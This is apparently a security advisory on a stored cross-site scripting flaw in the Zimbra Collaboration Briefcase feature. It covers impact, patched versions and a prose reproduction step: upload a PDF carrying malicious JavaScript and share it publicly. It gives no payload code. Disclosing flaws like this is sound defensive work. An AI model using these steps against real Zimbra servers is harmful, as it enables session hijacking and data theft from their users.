Zimbra Collaboration Stored Cross-Site Scripting Vulnerability in Briefcase Feature

A stored cross-site scripting vulnerability has been identified in the Zimbra Collaboration (ZCS) versions 10.0 and 10.1. This vulnerability arises in the Briefcase feature due to inadequate sanitization of certain uploaded file types. When a user accesses a publicly shared Briefcase file that contains malicious scripts, the embedded JavaScript executes within the user's session context. This exploitation allows an attacker to execute arbitrary scripts, potentially leading to unauthorized actions or data exfiltration on behalf of the affected user.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed in the context of the user’s session.

Reproduction

To reproduce this vulnerability, upload a PDF file containing malicious JavaScript into the Zimbra Briefcase. Ensure that the file is shared publicly. When the file is accessed, the JavaScript will execute, demonstrating the cross-site scripting vulnerability.

Remediation

Users can upgrade to ZCS versions 10.1.16, 10.0.18, or 8.8.15 Patch 47, all of which include the necessary fix for this vulnerability.